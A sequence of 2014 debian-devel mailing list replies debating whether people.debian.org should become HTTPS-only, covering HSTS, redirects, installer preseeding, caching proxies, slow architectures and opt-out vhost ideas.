On Sun, 20 Jul 2014, Iain R. Learmonth wrote: Pray tell: How do you make it default. See: http://en.wikipedia.org/wiki/HTTP_Strict_Transport_Security It sends a header to tell you you should be using HTTPS. Alas, that's not what HSTS is about or for. It cannot be used for this. -- | .''`. ** Debian ** Peter Palfrader | : :' : The universal http://www.palfrader.org/ | `. `' Operating System | `-http://www.debian.org/ -- To UNSUBSCRIBE, email to debian-devel-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/20140720122542.gl...@anguilla.noreply.org
Re: people.debian.org will move from ravel to paradis and become HTTPS only
W dniu 20/07/2014 11:01, Peter Palfrader napisał(a): I do think that if DSA are going to enforce such a policy, they should be able to explain why. What Ondřej said a.k.a. “because”. Do try better. – j. -- To UNSUBSCRIBE, email to debian-devel-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/c34936335ed61fa36ed5657b33eea...@hell.pl
Re: people.debian.org will move from ravel to paradis and become HTTPS only
Op zondag 20 juli 2014 13:52:20 schreef Peter Palfrader: On Sun, 20 Jul 2014, Wouter Verhelst wrote: These are all good arguments for enabling HTTPS and making it the default (which I've said repeatedly is a move that I support, or at the very least don't oppose), but not for *disabling* the possibility of plain HTTP. Pray tell: How do you make it default. - Enable HSTS on the domain - Run sed -i -e 's,http://people.debian.org,https://people.debian.org,g' over a webwml export. - Create a robots.txt file which is visible from the HTTP export (but not from the HTTPS one) which looks like this: User-Agent: * Disallow: / With those three easy steps, the only URLs that people will ever find will be HTTPS URLs. 99% of your traffic will be HTTPS traffic, and that will be a good thing. Yet when necessary, doing unencrypted HTTP will still be possible. It still misses something like step 2 for wiki.debian.org and all other stuff out there, but because of step 1 that shouldn't be *too* much of a problem. This will also help in, say, the (granted, hypothetical) scenario where a package in unstable breaks the system so badly that downloading files over HTTPS is no longer possible and a maintainer wants to post a (GPG-signed) patch over on http://people.debian.org -- It is easy to love a country that is famous for chocolate and beer -- Barack Obama, speaking in Brussels, Belgium, 2014-03-26 -- To UNSUBSCRIBE, email to debian-devel-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/4187590.a2xdfsn...@grep.be
Re: people.debian.org will move from ravel to paradis and become HTTPS only
Op zondag 20 juli 2014 13:28:43 schreef Marc Haber: On Sun, 20 Jul 2014 13:21:03 +0200, Wouter Verhelst w...@uter.be wrote: Op zondag 20 juli 2014 11:38:13 schreef Marc Haber: I might me missing something, and I admit not having read the entire thread, but how would they have access to private key material? Beyond GPG keys there are also DNSSEC private keys, SSL private keys, and (to some extent) router administration passwords could also be considered private keys. Why would material of that kind (short of the SSL private key for the https server) be on p.d.o? I didn't say that. -- It is easy to love a country that is famous for chocolate and beer -- Barack Obama, speaking in Brussels, Belgium, 2014-03-26 -- To UNSUBSCRIBE, email to debian-devel-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/23447020.uajmmu5...@grep.be
Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Sun, Jul 20, 2014, at 12:06, Tim Retout wrote: On 20 July 2014 10:07, Wouter Verhelst w...@uter.be wrote: With the state of the CA cartel these days, I have little trust in the strength of HTTPS as a verification mechanism, and so I wouldn't trust a file to be correct even if it came through an HTTPS connection that validates. Instead, I would only trust such a file if it came with a GPG signature from a key that is in the Debian keyring. Good, because that's not what HTTPS does for you. It makes it more difficult to watch exactly what you're accessing. Suppose for example I uploaded a preseed file to people.debian.org that created a Tor relay, and a suitably large government agency wanted to see all the IP addresses installing it. With HTTP, they just break into the internet backbone at an appropriate point, and log every request for that file in a *completely undetectable manner*. With HTTPS, they either need to break into the machine running people.debian.org, or start presenting a different SSL certificate - both things which can potentially be detected. Another situation is if a dissident accesses people.debian.org via Tor. With HTTP, the operator of the exit node they are using could MITM the request and tamper with the file - no state intervention required. If it's a web page, they could potentially attempt to exploit the browser. [...] This is excellent summary, thank you Tim. We should not forget that the metadata are interesting too (and thus we also need dns privacy, we don't have right now). Also one of the reasons to encrypt everywhere is that it makes much harder to decrypt everything. The more encrypted noise we have in the background the better. P.S.: And I am not known for my love for CAs :)... Ondrej -- Ondřej Surý ond...@sury.org Knot DNS (https://www.knot-dns.cz/) – a high-performance DNS server -- To UNSUBSCRIBE, email to debian-devel-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/1405869571.23682.143634353.4b92d...@webmail.messagingengine.com
Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Sun, 20 Jul 2014, Wouter Verhelst wrote: These are all good arguments for enabling HTTPS and making it the default (which I've said repeatedly is a move that I support, or at the very least don't oppose), but not for *disabling* the possibility of plain HTTP. Pray tell: How do you make it default. - Enable HSTS on the domain - Run sed -i -e 's,http://people.debian.org,https://people.debian.org,g' over a webwml export. - Create a robots.txt file which is visible from the HTTP export (but not from the HTTPS one) which looks like this: None of these brings people who type in people.debian.org into their browser to https. -- | .''`. ** Debian ** Peter Palfrader | : :' : The universal http://www.palfrader.org/ | `. `' Operating System | `-http://www.debian.org/ -- To UNSUBSCRIBE, email to debian-devel-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/20140720161914.gn...@anguilla.noreply.org
Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Sun, Jul 20, 2014 at 06:19:14PM +0200, Peter Palfrader wrote: None of these brings people who type in people.debian.org into their browser to https. Right. AFAICT the only technical change that will do that (sanely) is an HTTP-level redirection from http://(.*) to https://$1 . Having that enabled by default, plus a way for DDs to opt-out to the redirection (dunno, by dropping .no-https-by-default files in suitable sub-directories of ~/public_html) would nicely address the few objections I've seen in this thread. FWIW: - it's not entirely clear how much extra work implementing this would require. In particular, I haven't put much thought in an easy way to implement the directory-level opt-out. - I *personally* don't mind having https only, quite the contrary! But I got hooked by the discussions and couldn't resist proposing an API :) (sorry) Cheers. -- Stefano Zacchiroli . . . . . . . z...@upsilon.cc . . . . o . . . o . o Maître de conférences . . . . . http://upsilon.cc/zack . . . o . . . o o Former Debian Project Leader . . @zack on identi.ca . . o o o . . . o . « the first rule of tautology club is the first rule of tautology club » signature.asc Description: Digital signature
Re: people.debian.org will move from ravel to paradis and become HTTPS only
On 2014-07-20 08:15, Wouter Verhelst wrote: True, but debian-installer simply does not support any signed/encrypted preseeding. […] Granted, these are probably bugs, and IIRC Colin was working on providing HTTPS support for jessie. Still, I while I support enabling HTTPS for people.d.o, I think disabling HTTP is overdoing it. FWIW, Ubuntu trusty and precise both support HTTPS now (support was backported from trusty). wget would need to build a udeb in Debian and be able to take over /usr/bin/wget from busybox in d-i. I think the other changes are all in d-i parts. Basically you append trusted certs to the initramfs by specifying two initrds in the bootloader that are concatenated. Somebody™ would need to do the work, though. Kind regards Philipp Kern -- To UNSUBSCRIBE, email to debian-devel-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/74fc1c373ee2fe713a654169c129a...@hub.kern.lc
Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Sun, Jul 20, 2014 at 08:23:58PM +0200, Philipp Kern wrote: On 2014-07-20 08:15, Wouter Verhelst wrote: True, but debian-installer simply does not support any signed/encrypted preseeding. […] Granted, these are probably bugs, and IIRC Colin was working on providing HTTPS support for jessie. Still, I while I support enabling HTTPS for people.d.o, I think disabling HTTP is overdoing it. FWIW, Ubuntu trusty and precise both support HTTPS now (support was backported from trusty). wget would need to build a udeb in Debian and be able to take over /usr/bin/wget from busybox in d-i. I think the other changes are all in d-i parts. Basically you append trusted certs to the initramfs by specifying two initrds in the bootloader that are concatenated. Somebody™ would need to do the work, though. I'll hopefully get to finishing this at DebConf; I think I merged most of the safe and independent pieces already, and mostly just need to deal with wget-udeb. I'm not expecting to backport this to wheezy though. -- Colin Watson [cjwat...@debian.org] -- To UNSUBSCRIBE, email to debian-devel-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/20140720183026.ga15...@riva.ucam.org
Re: people.debian.org will move from ravel to paradis and become HTTPS only
Op zondag 20 juli 2014 18:19:14 schreef Peter Palfrader: On Sun, 20 Jul 2014, Wouter Verhelst wrote: These are all good arguments for enabling HTTPS and making it the default (which I've said repeatedly is a move that I support, or at the very least don't oppose), but not for *disabling* the possibility of plain HTTP. Pray tell: How do you make it default. - Enable HSTS on the domain - Run sed -i -e 's,http://people.debian.org,https://people.debian.org,g' over a webwml export. - Create a robots.txt file which is visible from the HTTP export (but not from the HTTPS one) which looks like this: None of these brings people who type in people.debian.org into their browser to https. If they type it in because they want to avoid HTTPS for whatever local reason, then that's a feature, not a bug. If they type it in because they were given a HTTP URL rather than a HTTPS one by someone else, then you should cluebat that someone else. Write a bot for IRC that cluebats people automatically if they provide HTTP rather than HTTPS URLs, for instance. Complain on mailinglists if you want to. If HSTS is enabled and you access people.debian.org even once (and you don't clear out their entire cache for as long as the HSTS timeout lives), then HSTS will ensure that the HTTP URL gets turned into an HTTPS URL automatically. What's the problem? Unencrypted traffic is *not* evil. Neither are people who for whatever local reason need to disable HTTPS. -- It is easy to love a country that is famous for chocolate and beer -- Barack Obama, speaking in Brussels, Belgium, 2014-03-26 -- To UNSUBSCRIBE, email to debian-devel-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/3393543.bd2t4uq...@grep.be
Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Sun, 20 Jul 2014, Stefano Zacchiroli wrote: AFAICT the only technical change that will do that (sanely) is an HTTP-level redirection from http://(.*) to https://$1 . That is my understanding as well. - it's not entirely clear how much extra work implementing this would require. In particular, I haven't put much thought in an easy way to implement the directory-level opt-out. - I *personally* don't mind having https only, quite the contrary! But I got hooked by the discussions and couldn't resist proposing an API :) (sorry) IMO, a dedicated vhost name sounds much more appealing than magic apache configs. I wonder whether it should use the same UserDirs. -- | .''`. ** Debian ** Peter Palfrader | : :' : The universal http://www.palfrader.org/ | `. `' Operating System | `-http://www.debian.org/ -- To UNSUBSCRIBE, email to debian-devel-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/20140720190005.gp...@anguilla.noreply.org
Re: people.debian.org will move from ravel to paradis and become HTTPS only
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 On 07/20/2014 03:08 PM, Wouter Verhelst wrote: Op zondag 20 juli 2014 18:19:14 schreef Peter Palfrader: None of these brings people who type in people.debian.org into their browser to https. If they type it in because they want to avoid HTTPS for whatever local reason, then that's a feature, not a bug. If they type it in because they were given a HTTP URL rather than a HTTPS one by someone else, then you should cluebat that someone else. What if they don't type in any protocol, but just type in the server name? That's very common among people who are less technically inclined (and who bother to type URLs at all), and even among those who are more so, ever since the day browsers first implemented the necessary smarts to let it work in the first place. Most browsers, and for that matter other HTTP clients, will default to trying HTTP - not HTTPS - if given a URL that doesn't specify any protocol. I'm anal-retentive about typing the full URL (including protocol) manually when not just clicking on a link, as a matter of standing on principle, and even I just accept that default sometimes. Changing that default, without forcing HTTPS in the way which people in this thread are objecting to, would seem to require changing all of those clients - a much, much bigger proposition than the administrators of any one server can practically tackle. - -- The Wanderer Secrecy is the beginning of tyranny. A government exists to serve its citizens, not to control them. -BEGIN PGP SIGNATURE- Version: GnuPG v1 Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iQIcBAEBCgAGBQJTzBZIAAoJEASpNY00KDJrlvkP/AytcRxckyGfR1qRu92Tto9F fkQKeUisziYe2/hTwlhXAwBp5wSZryXBJWMyyQSgwxm31EXvLrKg8DWlVc0l+CKm GSE1sFW1RjB8iaSZ7Joy0M+nu2rS7W+NMlTPIbeJ8QzGBqYb+QyhTHchJyIw1NmR j+1HsUWJwU69xEOvsk3Goev3OYe6xGGVwOqjYj2f3x7O2C063qi8YhvvsL6oXqgC 2JBZWsXLUDtfrHUZ4c2agkv6hjxZqIuWZkydcsRmHlUKqO9yqOjgMSr6bWNhjqlz ASpvuFpmA63xhqQ3NOVgoGQrwrPft/Lx6JGbgLmu/KSBPfH5GEzLipsJJjBtUo9+ 122kjba+gEXy+CNHU4Fny9+ZuxlMNqsDyeDqVDLMP76PdlWOw3F2ramYhgiPHsHm NyRNva8aQbsoH0B9Z9RsdbD3TbtNjL7fDerZ3dQEnPuwR9Xt451V/ATk77TuaSpI IIOvNRZDSG3fX6KZ41g/GyvJHyjaJ8r+5sUcbco042btymbCKjxTHEyWjB1f8ZGj GTndBcbgXn2hMKA/qMIDk+V+HJC+gdm4nx0h/ARRS856V9Fx7YQbSNz334q3ctqY MjIdIzNLkJif1g6FNdEhAhPYl5F7j4aywHEcwh9FQbt4pGXzuwa7fDTrznmCs0gT gPn4CIcCyRjzNrUWhSC9 =JiyN -END PGP SIGNATURE- -- To UNSUBSCRIBE, email to debian-devel-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/53cc1648.10...@fastmail.fm
Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Sun, 20 Jul 2014, Wouter Verhelst wrote: If HSTS is enabled and you access people.debian.org even once (and you don't clear out their entire cache for as long as the HSTS timeout lives), then HSTS will ensure that the HTTP URL gets turned into an HTTPS URL automatically. Alas, no. -- | .''`. ** Debian ** Peter Palfrader | : :' : The universal http://www.palfrader.org/ | `. `' Operating System | `-http://www.debian.org/ -- To UNSUBSCRIBE, email to debian-devel-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/20140720192247.gq...@anguilla.noreply.org
Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Sun, Jul 20, 2014 at 01:19:58PM +0200, Thijs Kinkhorst wrote: On Sun, July 20, 2014 08:15, Wouter Verhelst wrote: Op zaterdag 19 juli 2014 22:54:47 schreef u: Please note that there remain cases where accessing HTTPS is difficult or impossible. One of these (but by no means the only one) is the current release of debian-installer: the wget implementation inside stable d-i does not support https, so downloading files from people.d.o (e.g., for preseeding) will become impossible if this is implemented as stated. Hopefully you're not preseeding from a HTTP source, since that means you're quite vulnerable to trivial MITM attacks True, but debian-installer simply does not support any signed/encrypted preseeding. If you insist on using http, you can also just host your preseed files on http://grep.be. I don't see why DSA should wait to implement improvements to Debian services while there are perfect alternatives available to suit your use case. Because it's not an improvement to the service; it's a change that makes the *service* to Debian developers worse, for political reasons. Telling DDs you can just host the files on your own server is missing the point of why people.debian.org exists in the first place. -- Steve Langasek Give me a lever long enough and a Free OS Debian Developer to set it on, and I can move the world. Ubuntu Developerhttp://www.debian.org/ slanga...@ubuntu.com vor...@debian.org signature.asc Description: Digital signature
Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Sun, Jul 20, 2014 at 09:00:05PM +0200, Peter Palfrader wrote: IMO, a dedicated vhost name sounds much more appealing than magic apache configs. I wonder whether it should use the same UserDirs. Oh, right. With different UserDirs (bonus point: the default one, public_html/, being the one that works https-only) people can simply use symlinks. -- Stefano Zacchiroli . . . . . . . z...@upsilon.cc . . . . o . . . o . o Maître de conférences . . . . . http://upsilon.cc/zack . . . o . . . o o Former Debian Project Leader . . @zack on identi.ca . . o o o . . . o . « the first rule of tautology club is the first rule of tautology club » signature.asc Description: Digital signature
Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Mon, Jul 21, 2014 at 12:05:56AM +0200, Stefano Zacchiroli wrote: On Sun, Jul 20, 2014 at 09:00:05PM +0200, Peter Palfrader wrote: IMO, a dedicated vhost name sounds much more appealing than magic apache configs. I wonder whether it should use the same UserDirs. Oh, right. With different UserDirs (bonus point: the default one, public_html/, being the one that works https-only) people can simply use symlinks. I'm in favour of soylent.debian.org since soylent [green] is people. *cough* -- Luca Filipozzi http://www.crowdrise.com/SupportDebian -- To UNSUBSCRIBE, email to debian-devel-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/20140720222052.ga23...@emyr.net
Re: people.debian.org will move from ravel to paradis and become HTTPS only
Hi, On Sun, Jul 20, 2014 at 07:30:35PM +0100, Colin Watson wrote: I'll hopefully get to finishing this at DebConf; I think I merged most of the safe and independent pieces already, and mostly just need to deal with wget-udeb. I'm not expecting to backport this to wheezy though. yeah, it seems that you merged everything into git already. Yay! It's wget-udeb (relatively easy), but it's also either a new udeb for gnutls or like in Ubuntu one for libssl. (You sure know, but for the benefit of the list.) Kind regards Philipp Kern signature.asc Description: Digital signature
Re: people.debian.org will move from ravel to paradis and become HTTPS only
Op zondag 13 juli 2014 22:13:10 schreef Martin Zobel-Helas: Furthermore, we will change the people.debian.org web-service such that only HTTPS connections will be supported (unencrypted requests will be redirected). Why? Please note that there remain cases where accessing HTTPS is difficult or impossible. One of these (but by no means the only one) is the current release of debian-installer: the wget implementation inside stable d-i does not support https, so downloading files from people.d.o (e.g., for preseeding) will become impossible if this is implemented as stated. Is there an actual attack vector that we're trying to protect against which requires us to disable plain HTTP, or is this just yet another instance of the bogus HTTP is obsolete idea? -- It is easy to love a country that is famous for chocolate and beer -- Barack Obama, speaking in Brussels, Belgium, 2014-03-26 signature.asc Description: This is a digitally signed message part.
Re: people.debian.org will move from ravel to paradis and become HTTPS only
]] Wouter Verhelst Op zondag 13 juli 2014 22:13:10 schreef Martin Zobel-Helas: Furthermore, we will change the people.debian.org web-service such that only HTTPS connections will be supported (unencrypted requests will be redirected). Why? Because the world is a nastier place than it used to be. It's like the move from telnet to SSH many moons ago, all protocols ought to be encrypted today. Please note that there remain cases where accessing HTTPS is difficult or impossible. One of these (but by no means the only one) is the current release of debian-installer: the wget implementation inside stable d-i does not support https, so downloading files from people.d.o (e.g., for preseeding) will become impossible if this is implemented as stated. Hopefully you're not preseeding from a HTTP source, since that means you're quite vulnerable to trivial MITM attacks unless you do extra checking against checksums (something d-i doesn't support, AFAIK). Is there an actual attack vector that we're trying to protect against which requires us to disable plain HTTP, or is this just yet another instance of the bogus HTTP is obsolete idea? There are lots of attack vectors. It's not a response to a single attack being exploited in the wild. -- Tollef Fog Heen UNIX is user friendly, it's just picky about who its friends are -- To UNSUBSCRIBE, email to debian-devel-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/877g39f4rs@xoog.err.no
Re: Re: people.debian.org will move from ravel to paradis and become HTTPS only
2014-07-17 2:20 GMT+02:00 brian m. carlson sand...@crustytoothpaste.net: On Wed, Jul 16, 2014 at 11:43:17PM +0100, Steven Chamberlain wrote: Some sites (I mean, deployments) like to use a caching proxy, especially if many machines use the same resource, and/or bandwidth is scarce. Or even just one machine accessing the same resource often. Maybe this won't apply to anything particular on people.d.o, but certainly a lot of websites are breaking this recently by becoming HTTPS-only. Unfortunately, many of these proxies are broken. The Squid version in wheezy doesn't support HTTP/1.1, so trying to use chunked encoding or 100 Continue (which is required for certain applications[0]) simply doesn't work. And simply not working is one of the best failure cases for broken proxies. Using HTTPS ensures that the broken proxy problem is gone. I'm curious to know the rationale for shutting down HTTP access, because if it is to generally protect web browsers doing web-based login and using cookies, that would typically be covered by HSTS. And the privacy-concious may be using the HTTPS Everywhere add-on. I can't speak for DSA here, but I some of the reasons that I went HTTPS-only is that certificates are relatively cheap, pervasive monitoring is not going away, crypto is so cheap computationally on most platforms that there's no reason not to, and broken proxies suck. Those are all very good reasons for enabling HTTPS, but none of those serve as a good reason for disabling HTTP. It someone uses a broken proxy he/she can fix it or switch to https, but why are others required to switch? I for one would be unhappy with losing the ability of using a caching proxy for APT repositories hosted on p.d.o, I saved many GB-s of bandwidth this way. I have added debian-admin@l.d.o to CC since according to the email starting this thread this is the address where questions should be sent and apparently this thread did not get any attention of the Admin Team. Cheers, Balint [0] Git pushes over HTTP with Kerberos, among many others. -- brian m. carlson / brian with sandals: Houston, Texas, US +1 832 623 2791 | http://www.crustytoothpaste.net/~bmc | My opinion only OpenPGP: RSA v4 4096b: 88AC E9B2 9196 305B A994 7552 F1BA 225C 0223 B187 -- To UNSUBSCRIBE, email to debian-devel-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/CAK0OdpwRVSFPNBVdN=q2OyF5QNULhV+VuRQNayr0T=dizxw...@mail.gmail.com
Re: people.debian.org will move from ravel to paradis and become HTTPS only
2014-07-15 21:39 GMT+02:00 Philipp Kern pk...@debian.org: On 2014-07-15 16:00, Thorsten Glaser wrote: Martin Zobel-Helas dixit: Furthermore, we will change the people.debian.org web-service such that only HTTPS connections will be supported (unencrypted requests will be redirected). […] Take it as a heads-up to maybe move stuff elsewhere, if it needs http (e.g. APT repos work well via http since they use PGP for signatures). Actually, this will break most DDs’ APT repositories because apt-transport-https is usually not installed. Pointing machines to a non-mirrored SPoF running on donated project resources was bound to be not such a great idea anyway. Which place would be better for hosting DD's APT repositories? I had the impression that p.d.o were the usual place for them and it served quite well. I would also be interested in keeping plain HTTP to not break repositories (including mine :-)). Somehow Steve's question regarding the rationale behind disabling HTTP got cut out from email responses so let me raise it again: Why is it important to disable HTTP? Could it be kept enabled for APT repositories following some special directory structure like http://p.d.o/~user/ppa/* ? 2014-07-14 0:19 GMT+02:00 Steve Langasek vor...@debian.org: Hi Martin, On Sun, Jul 13, 2014 at 10:13:10PM +0200, Martin Zobel-Helas wrote: Furthermore, we will change the people.debian.org web-service such that only HTTPS connections will be supported (unencrypted requests will be redirected). Could you elaborate on why people.d.o will enforce https? If http connections are still allowed, this doesn't provide any protection from a MITM attack for most users; and the contents of people.d.o are not generally security sensitive. Is this part of a broader effort by DSA to increase use of https by default as a deterrent to large-scale traffic sniffing? Cheers, Balint -- To UNSUBSCRIBE, email to debian-devel-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/cak0odpymbo7gmge3khx08wtfu3bqz+just3tzvnj58ztq0a...@mail.gmail.com
Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Wed, 2014-07-16 at 19:50 +0200, Bálint Réczey wrote: 2014-07-15 21:39 GMT+02:00 Philipp Kern pk...@debian.org: On 2014-07-15 16:00, Thorsten Glaser wrote: Martin Zobel-Helas dixit: Furthermore, we will change the people.debian.org web-service such that only HTTPS connections will be supported (unencrypted requests will be redirected). […] Take it as a heads-up to maybe move stuff elsewhere, if it needs http (e.g. APT repos work well via http since they use PGP for signatures). Actually, this will break most DDs’ APT repositories because apt-transport-https is usually not installed. Pointing machines to a non-mirrored SPoF running on donated project resources was bound to be not such a great idea anyway. Which place would be better for hosting DD's APT repositories? I had the impression that p.d.o were the usual place for them and it served quite well. I would also be interested in keeping plain HTTP to not break repositories (including mine :-)). I would have thought it was possible to configure this redirection to be conditional on the User-Agent string. But also, perhaps apt should start recommending apt-transport-https. Ben. -- Ben Hutchings Hoare's Law of Large Problems: Inside every large problem is a small problem struggling to get out. signature.asc Description: This is a digitally signed message part
Re: Re: people.debian.org will move from ravel to paradis and become HTTPS only
Some sites (I mean, deployments) like to use a caching proxy, especially if many machines use the same resource, and/or bandwidth is scarce. Or even just one machine accessing the same resource often. Maybe this won't apply to anything particular on people.d.o, but certainly a lot of websites are breaking this recently by becoming HTTPS-only. In the case of people.d.o I guess most issues will arise from clients not having HTTPS support at all, or not being willing/able to follow a redirect. I'm curious to know the rationale for shutting down HTTP access, because if it is to generally protect web browsers doing web-based login and using cookies, that would typically be covered by HSTS. And the privacy-concious may be using the HTTPS Everywhere add-on. Regards, -- Steven Chamberlain ste...@pyro.eu.org -- To UNSUBSCRIBE, email to debian-devel-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/53c70005.5020...@pyro.eu.org
Re: Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Wed, Jul 16, 2014 at 11:43:17PM +0100, Steven Chamberlain wrote: Some sites (I mean, deployments) like to use a caching proxy, especially if many machines use the same resource, and/or bandwidth is scarce. Or even just one machine accessing the same resource often. Maybe this won't apply to anything particular on people.d.o, but certainly a lot of websites are breaking this recently by becoming HTTPS-only. Unfortunately, many of these proxies are broken. The Squid version in wheezy doesn't support HTTP/1.1, so trying to use chunked encoding or 100 Continue (which is required for certain applications[0]) simply doesn't work. And simply not working is one of the best failure cases for broken proxies. Using HTTPS ensures that the broken proxy problem is gone. I'm curious to know the rationale for shutting down HTTP access, because if it is to generally protect web browsers doing web-based login and using cookies, that would typically be covered by HSTS. And the privacy-concious may be using the HTTPS Everywhere add-on. I can't speak for DSA here, but I some of the reasons that I went HTTPS-only is that certificates are relatively cheap, pervasive monitoring is not going away, crypto is so cheap computationally on most platforms that there's no reason not to, and broken proxies suck. [0] Git pushes over HTTP with Kerberos, among many others. -- brian m. carlson / brian with sandals: Houston, Texas, US +1 832 623 2791 | http://www.crustytoothpaste.net/~bmc | My opinion only OpenPGP: RSA v4 4096b: 88AC E9B2 9196 305B A994 7552 F1BA 225C 0223 B187 signature.asc Description: Digital signature
Re: people.debian.org will move from ravel to paradis and become HTTPS only
Dixi quod… Martin Zobel-Helas dixit: Furthermore, we will change the people.debian.org web-service such that only HTTPS connections will be supported (unencrypted requests will be redirected). […] Take it as a heads-up to maybe move stuff elsewhere, if it needs http (e.g. APT repos work well via http since they use PGP for signatures). Actually, this will break most DDs’ APT repositories because apt-transport-https is usually not installed. bye, //mirabilos -- diogenese Beware of ritual lest you forget the meaning behind it. igli yeah but it means if you really care about something, don't ritualise it, or you will lose it. don't fetishise it, don't obsess. or you'll forget why you love it in the first place. -- To UNSUBSCRIBE, email to debian-devel-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/pine.bsm.4.64l.1407151359300.24...@herc.mirbsd.org
Re: people.debian.org will move from ravel to paradis and become HTTPS only
On 2014-07-15 16:00, Thorsten Glaser wrote: Martin Zobel-Helas dixit: Furthermore, we will change the people.debian.org web-service such that only HTTPS connections will be supported (unencrypted requests will be redirected). […] Take it as a heads-up to maybe move stuff elsewhere, if it needs http (e.g. APT repos work well via http since they use PGP for signatures). Actually, this will break most DDs’ APT repositories because apt-transport-https is usually not installed. Pointing machines to a non-mirrored SPoF running on donated project resources was bound to be not such a great idea anyway. Kind regards Philipp Kern -- To UNSUBSCRIBE, email to debian-devel-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/6af903cfa2279e9dd3dc1d935b2cb...@hub.kern.lc
m68k too slow for https? Re: people.debian.org will move from ravel to paradis and become HTTPS only
Hi, On Sonntag, 13. Juli 2014, Thorsten Glaser wrote: Furthermore, we will change the people.debian.org web-service such that only HTTPS connections will be supported (unencrypted requests will be redirected). This means that requests from wget (since it switched from OpenSSL to GnuTLS) and other utilities from slow architectures (such as m68k or avr32) to people.d.o will timeout. am I getting this right, that there are architectures which are too slow to use https??? if so: wow... (And, if that's the case, I dont't think we should care about those then... Debian doesn't run on an 6502 neither ;) cheers, Holger signature.asc Description: This is a digitally signed message part.
Re: m68k too slow for https? Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Mon, Jul 14, 2014 at 11:16:01AM +0200, Holger Levsen wrote: am I getting this right, that there are architectures which are too slow to use https??? if so: wow... This seems likely, especially for embedded platforms where power is a massive constraint. (And, if that's the case, I dont't think we should care about those then... Debian doesn't run on an 6502 neither ;) If Debian stops supporting embedded platforms, it stops being a universal operating system. I think HTTPS is a good thing, but could we not also have a VHOST named something like insecure.people.d.o that continued to allow access via plain HTTP? It is also possible (not sure about this) that there are countries where encryption is not permitted and so this would exclude anyone in those countries from accessing people.d.o's content. We have provisions in place (iirc) for accepting packages from people in such countries, we should also have provisions in place for allowing people in such countries to access people.d.o. Iain. -- e: i...@fsfe.orgw: iain.learmonth.me x: i...@jabber.fsfe.org t: +447875886930 c: MM6MVQ g: IO87we p: 1F72 607C 5FF2 CCD5 3F01 600D 56FF 9EA4 E984 6C49 pgp_T6mWDpapb.pgp Description: PGP signature
Re: m68k too slow for https? Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Mon, Jul 14, 2014 at 10:36:10AM +0100, Iain R. Learmonth wrote: If Debian stops supporting embedded platforms, it stops being a universal operating system. FSVO universal. I think this is not a good argument unless/until we have some more-or-less common and official agreement about what does universal mean for us. -- WBR, wRAR -- To UNSUBSCRIBE, email to debian-devel-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/20140714094817.ga28...@belkar.wrar.name
Re: m68k too slow for https? Re: people.debian.org will move from ravel to paradis and become HTTPS only
h01ger wrote: On Sonntag, 13. Juli 2014, Thorsten Glaser wrote: Furthermore, we will change the people.debian.org web-service such that only HTTPS connections will be supported (unencrypted requests will be redirected). This means that requests from wget (since it switched from OpenSSL to GnuTLS) and other utilities from slow architectures (such as m68k or avr32) to people.d.o will timeout. am I getting this right, that there are architectures which are too slow to use https??? if so: wow... No, this is only with some implementations. What differs, I do not know⦠maybe offered algorithms, or use of thread-local storage (which has syscall penalty on arches without a spare register, such as x86âs GS segment register, to use). When wget was switched from OpenSSL to GnuTLS (which I still consider a huge mistake) it no longer worked with most servers. (I have not checked whether this is still the case; I think there was a change in src:gnutls26 partially mitigating it later, and I didnât look at src:gnutls28 at all yet.) But then: yes, some systems are too slow for SSL with some other systems⦠for example, my home server (x86) does not connect with servers using 5120R or larger keys, 4096R is fine though (even with m68k). bye, //mirabilos -- To UNSUBSCRIBE, email to debian-devel-requ...@lists.debian.org with a subject of unsubscribe. 